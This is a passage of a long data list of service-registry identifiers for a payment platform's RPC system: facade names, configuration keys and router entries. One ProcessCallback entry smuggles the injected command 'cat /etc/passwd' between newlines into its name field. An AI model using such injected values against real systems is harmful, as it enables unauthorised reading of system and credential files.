_ROUTER","com.alipay.stocksupervise.common.service.facade.SofitoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.operation.common.service.facade.api.OperationActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_stockMerchantsOcrAddWhite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antgraph.facade.service.evaluation.CostEvaluationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.128.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_F_ASSET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfcenter.common.service.facade.ArCollectRefundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.task.remote.handler.RemoteTaskHandler:1.0:billRepayAgreement@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.partner.resource.PartnerResourceRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.PrizeConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.common.service.facade.api.DataDecisionServiceForHz2Sz:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.resource.ServicePortraitManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.166.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antmembermng_SceneCode_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.TemplateDeveloperFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.spi.RobotCallBackSPI:1.0:charge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.QrEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.fop.facade.FinServiceSeaViewRoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finslip.finreconSequenceDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airquery.uni.CommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetprod.common.facade.BubbleQuerySPIFacade:1.0:insptmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.MigrateHistoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.TransferInOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fcrcportal:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insclaimportal.common.service.InsClaimInstSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_EBPPGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.69.243.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchstoreapp.common.service.facade.store.manage.LightStoreOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayProjectNodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.asset.service.BoothManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\\ncat /etc/passwd\\n@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.allocation.EntrustWithdrawAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.7.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.integration.chngservice.proto.OpsChangeService:1.0:iseemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yuyan.swiftauth.BaaSAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_XPLATFORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finslip.common.service.facade.info.QueryFinslipDetailInfo:1.0:finslip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.aipNotifyWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.pushToDataBus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.policyDetailRedirectConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.faasset.api.asset.FaAssetCommonTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instopen.service.facade.TaskBeforeCallService:1.0:instportalmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.entrance.service.LightClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.IsvMerchantStatementServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","id.dana.bizcenter.common.service.facade.api.BizDanaGoodsManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.core.task.processor.RedoDetailProcessor:1.0:replayProcessor.default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.service.impl.LoadTestDebug:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.account.CfpAdjustVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fascore.product.STAGE_FUND_ASSET@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.common.service.facade.api.AlCorpAccreditRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.requiremng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.meta.MetaChangeKeyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.interaction.facade.UserCertificateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.settingendowment.SettingEndowmentRedeemCalendarChangeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.integration.einvoice.EinvoiceCompanyServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.auto.settle.DataSettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.SingleUrlAccessSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.variable.facade.VariableRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.common.service.store.external.facade.asset.StoreAssetQueryExternalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.rule.RuleManageService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifincore.facade.operation.ChannelSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.ItemAggQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.shop.ShopPublicBindingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbcateringorder.common.service.facade.api.order.CateringOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.core.notify.NotifyConfig.ivrOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.myInsurancePlatformProductMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:smart_msg_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.bag.facade.BagQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:aeicoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iotbsp.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcheck.common.service.facade.fusecheck.service.FuseCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.${fluxconf_app_name}:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.dumpLogTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finquotationcenter.common.service.facade.api.FullSnapshotStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.AgrtProductManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.custassetTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.credible.UserCredibleMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.fabs.api.manage.FinanceAssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kbdiscount:name=com.alipay.kbdiscount.common.service.facade.utils.drm.DisCountFilterDrm.needFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.common.acl.UserManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promox.facade.adsense.AdsenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@opensupport#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.csplatform.service.facade.api.SynchronizeServiceRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bketencop.facade.api.TaskProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antthoth.service.facade.ModelDeployTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundUserOptionalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.integration.ty.TYClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CustomerTagQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inststub.common.service.facade.message.InstMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.ram.RestSensitivityLevelService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bis.common.service.facade.gw.config.PapersClientConfigGwFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.template.api.MerchantTemplateCacheQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.schema.DataStoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfactory.common.service.facade.video.YoukuVideoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.client.AppActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.user.LoanLabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.NewAppRankRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.api.TaskExecutorBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insclaimdecision.common.service.InsPlayBackManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.express.manage.SignParamManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SIHAIFIRST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasecore.service.hyperlinks.facade.HyperlinksService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrorprod.facade.opscloud.OpscloudFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloanpromo.service.BenefitExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:ebppcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:asttshipcoreFluxInstrctionService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.ZproxyRPvSofaService:1.0:zproxyRForMR@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.SubscribeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MDEVSUPPORT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iconnect.common.facade.api.CreativeResourceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ext.QueryCheckResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.JbDataCatQuaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_ORDERMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:fascore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmDownGradeResourceTrigger.openCutFinanceServiceStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sandbox.service.facade.logsearch.LogSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.DemoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcsmartdecision.service.PcreditSmartDeductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antemc.service.facade.TrsbrainMsgEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antcloud.component.endpoint.sofarest.SystemParametersRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.share.ContractFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.WeikeTaskSourceQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@isdsp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.mrchorder.ordercenter.facade.service.InstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gftms.facade.api.basic.account.BankAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:statusbar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.RegionStatusSwitch.grayTenants,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.topic.api.TopicQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.budget.facade.DimensionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.SceneSectionManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kbbusinessprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.UserAttributeComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.libracore.common.service.facade.api.AstPlanDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilimitcenter.service.facade.api.LimitConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.content.ContentPresentationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.program.ProgramQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DQS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpromoprod.facade.access.BizSheetFacade:1.0:mrchpromoprodBizSheet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_FCTCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradeguard.core.service.repository.PurchaseControlOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.forum.ForumGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.QueryBalanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_editMerchAccNameCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.StockDiscoveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.inspect.VoucherPmsRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.view.fastrecoveryplan.service.FastRecoveryPlanQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.ContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promocenter.facade.api.galaxy.XMktActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.meshyorg.com.service.integration.fcbuservice.PermissionFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_BATCHWISE_AUTO_FINISH_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.87.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.20.145.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tradequote.api.L2SnapshotQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:antiep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.monitorHAValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:cdp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.material.LifeMaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.insurance.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antmember.common.service.facade.LotteryOperateLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.DarwinDiversionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:socialportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestMockParamDrm.openMockMethodSleepMS,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.uemprod.common.service.facade.productgray.ProductGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.distribution.channel.api.DistributionChannelManualFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.gotone.common.service.api.SendMailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:clearingCenterStateResolver@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.ApiGroupServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcrud.core.Zcrud$Agent:1.0:ebppgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.BusinessCountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.user.api.SecuUserVisitMentalFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.116.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.mini.dev.MiniAnalyseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgengine.core.service.edit.KnowledgeEditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_169.254.230.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:abnclprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iinnertrans.facade.api.InnerRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.prodcoreTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcalm-momeidev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@astaralarm#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.moaprod.common.query.MoaConsumeOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtaskcenter.service.facade.FundCorpAccountInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.PublicAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zdal.ldc.tair.customerv2.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ccdc.common.service.facade.CardInfoWriteService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:prodcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arater.common.service.triple.RateQueryConsumeStatus:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.AlarmScheduleSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.region.admin.RegionQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.giftprod.common.service.facade.inner.GiftCrowdGzReceiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpdcore:name=com.alipay.fin.pdcore.core.service.innerclient.master.drm.MasterConfigDRM.isCleanMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.rec.api.RecPositionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alphad.common.service.facade.tntinst.api.ITntInstMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resou